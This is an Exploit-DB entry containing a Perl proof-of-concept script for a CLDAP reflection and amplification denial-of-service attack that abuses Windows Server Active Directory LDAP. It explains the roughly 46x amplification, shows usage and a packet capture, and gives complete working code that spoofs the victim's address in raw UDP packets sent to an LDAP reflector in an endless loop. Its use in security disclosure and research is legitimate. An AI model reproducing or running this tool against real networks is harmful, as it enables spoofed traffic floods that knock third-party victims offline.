Microsoft Windows Server 2008/2012 - LDAP RootDSE Netlogon Denial of Service

EDB-ID:

40703

CVE:

N/A


Type:

dos


Platform:

Windows

Date:

2016-11-08


#!/usr/bin/perl
#
#  MS Windows Server 2008/2008 R2/ 2012/2012 R2/ AD LDAP RootDSE Netlogon 
#  (CLDAP "AD Ping") query reflection DoS PoC
#
#  Copyright 2016 (c) Todor Donev
#  Varna, Bulgaria
#  todor.donev@gmail.com
#  https://www.ethical-hacker.org/
#  https://www.facebook.com/ethicalhackerorg
#  http://pastebin.com/u/hackerscommunity 
#
#  MS Windows Server 2016       [NOT TESTED !!!]
# 
#  Description:
#  The attacker  sends a simple query to a vulnerable reflector 
#  supporting the Connectionless LDAP service (CLDAP) and using 
#  address spoofing makes it appear to originate from the intended 
#  victim. The CLDAP service responds to the spoofed address, 
#  sending unwanted network traffic to the attacker’s intended target.
# 
#  Amplification techniques allow bad actors to intensify the size 
#  of their attacks, because the responses generated by the LDAP 
#  servers are much larger than the attacker’s queries. In this case, 
#  the LDAP service responses are capable of reaching very high 
#  bandwidth and we have seen an average amplification factor of 
#  46x and a peak of 55x.
#
#
#  Disclaimer:
#  This or previous program is for Educational purpose ONLY. Do not 
#  use it without permission. The usual disclaimer applies, especially 
#  the fact that Todor Donev is not liable for any damages caused by 
#  direct or indirect use of the information or functionality provided 
#  by these programs. The author or any Internet provider bears NO 
#  responsibility for content or misuse of these programs or any 
#  derivatives thereof. By using these programs you accept the fact
#  that any damage (dataloss, system crash, system compromise, etc.) 
#  caused by the use of these programs is not Todor Donev's 
#  responsibility.
#
#  Use at your own risk and educational
#  purpose ONLY!
#
#  See also, UDP-based Amplification Attacks:
#  https://www.us-cert.gov/ncas/alerts/TA14-017A
#
#
#  # perl cldapdrdos.pl 192.168.1.112 192.168.1.146
#  [ MS Windows Server 2008/2008 R2/ 2012/2012 R2/ AD LDAP RootDSE Netlogon (CLDAP "AD Ping") query reflection DoS PoC
#  [ ======
#  [ Usg: cldapdrdos.pl <ldap server> <target> <port>
#  [ Default port: 389
#  [ Example: perl cldapdrdos.pl 192.168.30.56 192.168.1.1
#  [ ======
#  [ <todor.donev@gmail.com> Todor Donev
#  [ Facebook: https://www.facebook.com/ethicalhackerorg
#  [ Website: https://www.ethical-hacker.org/
#  [ Sending CLDAP "AD Ping" packets..
#  ^C
#  # tcpdump -i eth0 -c4 port 389
#  tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
#  listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
#  00:00:58.638466 IP attacker.31337 > target.ldap: UDP, length 57
#  00:00:58.639360 IP target.ldap > attacker.31337: UDP, length 2315        ## LOOOL...
#  00:00:59.039293 IP attacker.31337 > target.ldap: UDP, length 57
#  00:00:59.041043 IP target.ldap > attacker.31337: UDP, length 2315        ## LOOOL...
#  4 packets captured
#  6 packets received by filter
#  0 packets dropped by kernel
#
#
#
  
use Net::RawIP;

print "[ MS Windows Server 2008/2008 R2/ 2012/2012 R2/ AD LDAP RootDSE Netlogon (CLDAP \"AD Ping\") query reflection DoS PoC\n";
print "[ ======\n";
print "[ Usg: $0 <ldap server> <target> <port>\n";
print "[ Default port: 389\n";
print "[ Example: perl $0 192.168.30.56 192.168.1.1\n";
print "[ ======\n";
print "[ <todor.donev\@gmail.com> Todor Donev\n";
print "[ Facebook: https://www.facebook.com/ethicalhackerorg\n";
print "[ Website: https://www.ethical-hacker.org/\n";

my $cldap       = $ARGV[0];
my $target      = $ARGV[1];
my $port        = $ARGV[2] || '389';

die "[ Error: Port must be between 1 and 65535!\n"       if ($port < 1 || $port > 65535);

my $query  = "\x30\x25\x02\x01\x01\x63\x20\x04\x00\x0a";
$query    .= "\x01\x00\x0a\x01\x00\x02\x01\x00\x02\x01";
$query    .= "\x00\x01\x01\x00\x87\x0b\x6f\x62\x6a\x65";
$query    .= "\x63\x74\x63\x6c\x61\x73\x73\x30\x00\x00";
$query    .= "\x00\x30\x84\x00\x00\x00\x0a\x04\x08\x4e";
$query    .= "\x65\x74\x6c\x6f\x67\x6f\x6e";
 
my $sock =  new Net::RawIP({ udp => {} }) or die;
print "[ Sending CLDAP \"AD Ping\" packets..\n";
while () {
                select(undef, undef, undef, 0.40);         # Sleep 400 milliseconds
                $sock->set({  ip =>  { saddr  => $target, daddr => $cldap},
                             udp =>  { source => 31337,   dest  => $port, data => $query} });
                $sock->send;
}